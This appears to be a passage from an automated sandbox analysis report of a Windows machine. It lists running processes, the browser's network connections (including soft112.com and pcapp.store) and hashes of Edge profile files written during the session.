C:\Windows\SysWOW64\BackgroundTransferHost.exe
"C:\Windows\System32\BackgroundTransferHost.exe"
C:\Windows\SysWOW64\bitsadmin.exe
"C:\Windows\System32\bitsadmin.exe"
C:\Windows\SysWOW64\bootcfg.exe
"C:\Windows\System32\bootcfg.exe"
C:\Windows\SysWOW64\bthudtask.exe
"C:\Windows\System32\bthudtask.exe"
C:\Windows\SysWOW64\ByteCodeGenerator.exe
"C:\Windows\System32\ByteCodeGenerator.exe"
C:\Windows\SysWOW64\cacls.exe
"C:\Windows\System32\cacls.exe"
C:\Windows\SysWOW64\calc.exe
"C:\Windows\System32\calc.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\SysWOW64\CameraSettingsUIHost.exe
"C:\Windows\System32\CameraSettingsUIHost.exe"
C:\Windows\SysWOW64\CertEnrollCtrl.exe
"C:\Windows\System32\CertEnrollCtrl.exe"
C:\Windows\SysWOW64\certreq.exe
"C:\Windows\System32\certreq.exe"
C:\Windows\SysWOW64\certutil.exe
"C:\Windows\System32\certutil.exe"
C:\Windows\SysWOW64\charmap.exe
"C:\Windows\System32\charmap.exe"
C:\Windows\SysWOW64\CheckNetIsolation.exe
"C:\Windows\System32\CheckNetIsolation.exe"
C:\Windows\SysWOW64\chkdsk.exe
"C:\Windows\System32\chkdsk.exe"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\SysWOW64\chkntfs.exe
"C:\Windows\System32\chkntfs.exe"
C:\Windows\SysWOW64\choice.exe
"C:\Windows\System32\choice.exe"
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa385e855 /state1:0x41c64e6d
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=104 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7512 /prefetch:1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | google.com | udp |
| GB | 142.250.178.14:80 | google.com | tcp |
| GB | 142.250.178.14:80 | google.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:80 | www.google.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ogs.google.com | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 142.250.187.238:443 | ogs.google.com | tcp |
| GB | 142.250.200.14:443 | apis.google.com | tcp |
| US | 8.8.8.8:53 | ssl.gstatic.com | udp |
| GB | 172.217.169.3:443 | ssl.gstatic.com | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.179.238:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| GB | 142.250.179.238:443 | play.google.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 238.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| BE | 2.17.107.123:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 123.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | encrypted-tbn0.gstatic.com | udp |
| GB | 142.250.178.14:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 142.250.178.14:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 142.250.178.14:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 142.250.178.14:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 142.250.178.14:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 142.250.178.14:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 142.250.178.14:443 | encrypted-tbn0.gstatic.com | udp |
| US | 8.8.8.8:53 | id.google.com | udp |
| GB | 216.58.213.3:443 | id.google.com | tcp |
| US | 8.8.8.8:53 | 3.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.251.17.2.in-addr.arpa | udp |
| GB | 216.58.213.3:443 | id.google.com | udp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| GB | 172.217.169.86:443 | i.ytimg.com | tcp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| GB | 142.250.187.206:443 | www.youtube.com | udp |
| US | 8.8.8.8:53 | 86.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.187.250.142.in-addr.arpa | udp |
| GB | 172.217.169.86:443 | i.ytimg.com | udp |
| GB | 142.250.179.238:443 | www.youtube.com | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| GB | 172.217.16.226:443 | googleads.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | static.doubleclick.net | udp |
| GB | 172.217.16.226:443 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | jnn-pa.googleapis.com | udp |
| GB | 216.58.213.6:443 | static.doubleclick.net | tcp |
| GB | 216.58.212.202:443 | jnn-pa.googleapis.com | tcp |
| GB | 216.58.212.202:443 | jnn-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | 226.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.212.58.216.in-addr.arpa | udp |
| GB | 142.250.179.238:443 | www.youtube.com | udp |
| US | 8.8.8.8:53 | archive.org | udp |
| US | 207.241.224.2:443 | archive.org | tcp |
| US | 207.241.224.2:443 | archive.org | tcp |
| US | 8.8.8.8:53 | polyfill.archive.org | udp |
| US | 8.8.8.8:53 | 2.224.241.207.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 207.241.239.241:443 | polyfill.archive.org | tcp |
| US | 8.8.8.8:53 | analytics.archive.org | udp |
| US | 207.241.225.195:443 | analytics.archive.org | tcp |
| US | 8.8.8.8:53 | 241.239.241.207.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.225.241.207.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dn790006.ca.archive.org | udp |
| US | 184.105.203.173:443 | dn790006.ca.archive.org | tcp |
| US | 8.8.8.8:53 | 173.203.105.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 185.199.111.133:443 | avatars.githubusercontent.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | user-images.githubusercontent.com | udp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 140.82.113.21:443 | collector.github.com | tcp |
| US | 140.82.113.21:443 | collector.github.com | tcp |
| US | 140.82.113.21:443 | collector.github.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | 21.113.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 142.250.187.238:443 | drive.google.com | udp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 225.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | camo.githubusercontent.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 142.250.187.238:443 | drive.google.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| GB | 216.58.213.3:443 | id.google.com | udp |
| GB | 172.217.169.86:443 | i.ytimg.com | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| GB | 216.58.212.202:443 | jnn-pa.googleapis.com | udp |
| GB | 142.250.179.238:443 | www.youtube.com | udp |
| US | 8.8.8.8:53 | 226.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gamejolt.com | udp |
| US | 104.18.5.160:443 | gamejolt.com | tcp |
| US | 104.18.5.160:443 | gamejolt.com | tcp |
| US | 8.8.8.8:53 | s.gjcdn.net | udp |
| US | 104.18.24.184:443 | s.gjcdn.net | tcp |
| US | 104.18.24.184:443 | s.gjcdn.net | tcp |
| US | 8.8.8.8:53 | firebase.googleapis.com | udp |
| US | 8.8.8.8:53 | 160.5.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 184.24.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | firebaseremoteconfig.googleapis.com | udp |
| US | 8.8.8.8:53 | 202.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | global.proper.io | udp |
| GB | 99.86.114.55:443 | global.proper.io | tcp |
| US | 8.8.8.8:53 | m.gjcdn.net | udp |
| US | 8.8.8.8:53 | 55.114.86.99.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.39.156.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | abcheck.proper.io | udp |
| GB | 18.244.114.19:443 | abcheck.proper.io | tcp |
| GB | 18.244.114.19:443 | abcheck.proper.io | tcp |
| GB | 142.250.200.34:443 | securepubads.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | secure.quantserve.com | udp |
| DE | 91.228.74.244:443 | secure.quantserve.com | tcp |
| GB | 142.250.200.34:443 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | rules.quantcount.com | udp |
| GB | 18.245.187.55:443 | rules.quantcount.com | tcp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | pixel.quantserve.com | udp |
| US | 8.8.8.8:53 | 19.114.244.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.187.245.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 244.74.228.91.in-addr.arpa | udp |
| GB | 142.250.187.238:443 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | 66.204.58.216.in-addr.arpa | udp |
| GB | 142.250.178.14:443 | www.youtube.com | udp |
| US | 8.8.8.8:53 | encrypted-vtbn0.gstatic.com | udp |
| GB | 142.250.180.14:443 | encrypted-vtbn0.gstatic.com | tcp |
| US | 8.8.8.8:53 | the-virus-x-scary-horror-game.soft112.com | udp |
| US | 45.58.113.196:443 | the-virus-x-scary-horror-game.soft112.com | tcp |
| US | 45.58.113.196:443 | the-virus-x-scary-horror-game.soft112.com | tcp |
| US | 45.58.113.196:443 | the-virus-x-scary-horror-game.soft112.com | tcp |
| US | 8.8.8.8:53 | www.soft112.com | udp |
| US | 209.222.98.21:443 | www.soft112.com | tcp |
| US | 209.222.98.21:443 | www.soft112.com | tcp |
| US | 209.222.98.21:443 | www.soft112.com | tcp |
| US | 8.8.8.8:53 | www.clarity.ms | udp |
| US | 13.107.246.64:443 | www.clarity.ms | tcp |
| US | 8.8.8.8:53 | 196.113.58.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.98.222.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | analytics.google.com | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | cdn.soft112.com | udp |
| GB | 143.244.38.136:443 | cdn.soft112.com | tcp |
| US | 216.239.34.181:443 | analytics.google.com | tcp |
| BE | 64.233.167.154:443 | stats.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | x.clarity.ms | udp |
| US | 20.114.190.119:443 | x.clarity.ms | tcp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | tcp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | tcp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | tcp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | tcp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | tcp |
| US | 8.8.8.8:53 | 64.246.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.38.244.143.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.34.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.167.233.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.190.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.16.217.172.in-addr.arpa | udp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | c.clarity.ms | udp |
| IE | 13.74.129.1:443 | c.clarity.ms | tcp |
| US | 8.8.8.8:53 | c.bing.com | udp |
| US | 13.107.21.237:443 | c.bing.com | tcp |
| US | 8.8.8.8:53 | 2.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.129.74.13.in-addr.arpa | udp |
| US | 216.239.34.181:443 | analytics.google.com | udp |
| US | 8.8.8.8:53 | gcm.ctnsnet.com | udp |
| US | 8.8.8.8:53 | d5p.de17a.com | udp |
| US | 8.8.8.8:53 | match.prod.bidr.io | udp |
| US | 8.8.8.8:53 | c1.adform.net | udp |
| US | 8.8.8.8:53 | t.adx.opera.com | udp |
| US | 8.8.8.8:53 | sync.gonet-ads.com | udp |
| US | 8.8.8.8:53 | sync-dmp.aura-dsp.com | udp |
| US | 8.8.8.8:53 | cm.g.doubleclick.net | udp |
| SE | 213.155.156.181:443 | d5p.de17a.com | tcp |
| US | 35.186.193.173:443 | gcm.ctnsnet.com | tcp |
| DK | 37.157.2.229:443 | c1.adform.net | tcp |
| NL | 23.109.14.90:443 | sync.gonet-ads.com | tcp |
| NL | 82.145.213.8:443 | t.adx.opera.com | tcp |
| IE | 52.49.131.125:443 | match.prod.bidr.io | tcp |
| US | 8.8.8.8:53 | a.tribalfusion.com | udp |
| US | 8.8.8.8:53 | dclk-match.dotomi.com | udp |
| US | 8.8.8.8:53 | creativecdn.com | udp |
| US | 8.8.8.8:53 | px.ads.linkedin.com | udp |
| US | 8.8.8.8:53 | dis.criteo.com | udp |
| US | 8.8.8.8:53 | analytics.pangle-ads.com | udp |
| US | 13.107.42.14:443 | px.ads.linkedin.com | tcp |
| NL | 185.184.8.90:443 | creativecdn.com | tcp |
| NL | 89.207.16.201:443 | dclk-match.dotomi.com | tcp |
| US | 104.18.24.173:443 | a.tribalfusion.com | tcp |
| US | 104.126.119.105:443 | analytics.pangle-ads.com | tcp |
| NL | 178.250.1.9:443 | dis.criteo.com | tcp |
| BE | 2.17.107.226:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | 173.193.186.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.14.109.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.213.145.82.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.2.157.37.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.156.155.213.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 125.131.49.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.42.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.24.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.16.207.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.1.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.119.126.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.8.184.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | s.tribalfusion.com | udp |
| US | 8.8.8.8:53 | pcapp.store | udp |
| US | 159.223.126.41:443 | pcapp.store | tcp |
| US | 159.223.126.41:443 | pcapp.store | tcp |
| US | 8.8.8.8:53 | 41.126.223.159.in-addr.arpa | udp |
| US | 8.8.8.8:53 | repository.pcapp.store | udp |
| GB | 195.181.164.17:443 | repository.pcapp.store | tcp |
| GB | 195.181.164.17:443 | repository.pcapp.store | tcp |
| GB | 195.181.164.17:443 | repository.pcapp.store | tcp |
| GB | 195.181.164.17:443 | repository.pcapp.store | tcp |
| GB | 195.181.164.17:443 | repository.pcapp.store | tcp |
| GB | 195.181.164.17:443 | repository.pcapp.store | tcp |
| US | 8.8.8.8:53 | google.com | udp |
| GB | 142.250.178.14:443 | google.com | tcp |
| BE | 64.233.167.154:443 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | 17.164.181.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | repcdn.pcapp.store | udp |
| GB | 195.181.164.16:443 | repcdn.pcapp.store | tcp |
| US | 8.8.8.8:53 | 16.164.181.195.in-addr.arpa | udp |
| NL | 178.250.1.9:443 | dis.criteo.com | tcp |
| US | 8.8.8.8:53 | pr-bh.ybp.yahoo.com | udp |
| US | 8.8.8.8:53 | onetag-sys.com | udp |
| US | 8.8.8.8:53 | x.bidswitch.net | udp |
| US | 8.8.8.8:53 | um.simpli.fi | udp |
| US | 8.8.8.8:53 | b1sync.zemanta.com | udp |
| US | 8.8.8.8:53 | a.rfihub.com | udp |
| DE | 51.75.86.98:443 | onetag-sys.com | tcp |
| US | 64.74.236.255:443 | b1sync.zemanta.com | tcp |
| NL | 193.0.160.130:443 | a.rfihub.com | tcp |
| IE | 54.77.108.145:443 | pr-bh.ybp.yahoo.com | tcp |
| NL | 35.214.149.91:443 | x.bidswitch.net | tcp |
| NL | 34.91.62.186:443 | um.simpli.fi | tcp |
| NL | 34.91.62.186:443 | um.simpli.fi | tcp |
| NL | 35.214.149.91:443 | x.bidswitch.net | tcp |
| IE | 54.77.108.145:443 | pr-bh.ybp.yahoo.com | tcp |
| US | 64.74.236.255:443 | b1sync.zemanta.com | tcp |
| DE | 51.75.86.98:443 | onetag-sys.com | tcp |
| NL | 193.0.160.130:443 | a.rfihub.com | tcp |
| US | 8.8.8.8:53 | 98.86.75.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.160.0.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.149.214.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.108.77.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.62.91.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 255.236.74.64.in-addr.arpa | udp |
| GB | 216.58.213.3:443 | id.google.com | udp |
| US | 8.8.8.8:53 | csi.gstatic.com | udp |
| US | 216.239.32.3:443 | csi.gstatic.com | tcp |
| GB | 172.217.169.86:443 | i.ytimg.com | udp |
| US | 8.8.8.8:53 | 3.32.239.216.in-addr.arpa | udp |
| GB | 216.58.212.202:443 | firebaseremoteconfig.googleapis.com | udp |
| GB | 142.250.178.14:443 | google.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | 91.65.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | b704c9ca0493bd4548ac9c69dc4a4f27 |
| SHA1 | a3e5e54e630dabe55ca18a798d9f5681e0620ba7 |
| SHA256 | 2ebd5229b9dc642afba36a27c7ac12d90196b1c50985c37e94f4c17474e15411 |
| SHA512 | 69c8116fb542b344a8c55e2658078bd3e0d3564b1e4c889b072dbc99d2b070dacbc4394dedbc22a4968a8cf9448e71f69ec71ded018c1bacc0e195b3b3072d32 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 477462b6ad8eaaf8d38f5e3a4daf17b0 |
| SHA1 | 86174e670c44767c08a39cc2a53c09c318326201 |
| SHA256 | e6bbd4933b9baa1df4bb633319174de07db176ec215e71c8568d27c5c577184d |
| SHA512 | a0acc2ef7fd0fcf413572eeb94d1e38aa6a682195cc03d6eaaaa0bc9e5f4b2c0033da0b835f4617aebc52069d0a10b52fc31ed53c2fe7943a480b55b7481dd4e |
\??\pipe\LOCAL\crashpad_2348_VHQAWNHPOCOJEIYO
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | ee85f1c30ccba97182625785bd14d45d |
| SHA1 | d6bf12015a754e21eb2f66264efe0e866f9007c0 |
| SHA256 | abc2950cedd96e98b1c054cffbc43ef2754f2e1df87fccbc643943d41ee6aaf0 |
| SHA512 | 170b359ce27ab3f58b2854e8cba4e9ee0fa4eae1462552287862c89cde8dbde1e2172a1717e7b98a43b6dda3c9d0bae0d99d9192d333d29d11ca9108ff6a5a3d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | e6b2ae4cc98afbd14297551f0498662a |
| SHA1 | ab827f0c06ea06dd49b66a30df188add7202ec0b |
| SHA256 | 523de91f756e00333940633c134ed1786b628009119fbbcbeee935b12099f46e |
| SHA512 | 7c32719084e23bf52c6328bb446e575b2d112257ddd910f395f7916aa8a17ba9a1b181b1744aefe3cb87798cb8a76ab8a5e341330512d574358a591b66c96078 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | c30fbfe4fae9312200c89b49bc108a34 |
| SHA1 | 546e692c5d3d213378bb357c8816c8bdd6f39268 |
| SHA256 | 188999739a3b41e2e18eb4e0c0c7c85001f5cadd1c7ec6b5ff04d2269d731368 |
| SHA512 | f76a16c1ccd4af012ad2894e107adab98d5df23eb75eadee68fb4fd0497aa2be3d6064e12c29431ce5ac842df48f7ea8cae6c1eb0da3dda6601f07b40be6909b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5799ee.TMP
| MD5 | f4bb255d01eabfa3b55090bf9ba5b19c |
| SHA1 | d8d94415d9e79ea0082570cb9284d54cfe09c4b0 |
| SHA256 | f3e8c5453bc3bdaa572a1dffc321a35f19626b150416336ed010730f300aee62 |
| SHA512 | a6aff13dd539d86ed5404588aaded789bdea13f891d37857ffc99dda847774f283b748752704bfe5a36d85c57010ee891c7ede9d90992bb44e5be53bf9b64bfc |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 8d28dd79bf7dc9d500753865aab3287a |
| SHA1 | 98be32da77674eac45f9f1a05aa48bb04b23df1d |
| SHA256 | 02cdfcf075d8848bf3618e3bade73b0344f354c560007c858ac2a656345f6cfd |
| SHA512 | 67505c7cc66a63b85057851f4b59703574eb102f16ca89cc67410401dc7dcaf081e6219512ef1b7ada6c6ed71d3eb40fc91ca11bb950bf26f1e9166b053db140 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | f4904048a4aa6e3f3551f9bb5cd98a7b |
| SHA1 | 3069da5fde0e034abc25145b9c3206a26b101d6a |
| SHA256 | ccde2a638b4e9b48fed2cbc9aa91c1e8d0e5e56a1c77d5fe82ccf1b80fce4cd4 |
| SHA512 | 49305bcd7f2087c8ce3531b5ea4d8d68608e297268d029a0c6ecde6410a6fb1ceaf9082dc0329f3a9838a528cc9984f39975f4a0e9c6bbffd1ba02e2c33b43e8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 952da8c10e8836eb5d4ee3a58e3ab3ec |
| SHA1 | 3b79ab299391c4ba1ee6d278bab89f818d58aa65 |
| SHA256 | 4ef19b1e0e9b64535f65b3d165cd65e304dcbfa8680ed80a0762dbff9a480642 |
| SHA512 | 21d3fb7849d7ff6a4f4aaa510fd9aa8b31b7c195e238cba2e1bed60691a8d55ad138d73d94a6f2c39b93bf6b5d3914f2ac49b10cceea6e1d6d19655b52bca384 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 7158bab79248cf3f6ab41cd7877252f1 |
| SHA1 | 9b2f56152772cb51a51fa5458d70b0cac6af7a2a |
| SHA256 | ee86fbf87e6c495bdb9f75d80e0c14720dbc80525f2158bf9b82ca45fdffa488 |
| SHA512 | 02358eb71a04afd03c3a0a74eb83c3b24662154859159a8b9e8de337eae4baff3c34d865acf300c5cfa4609a5c43f2494221d14c2827a6dbd85d0679562adb67 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | 2892eee3e20e19a9ba77be6913508a54 |
| SHA1 | 7c4ef82faa28393c739c517d706ac6919a8ffc49 |
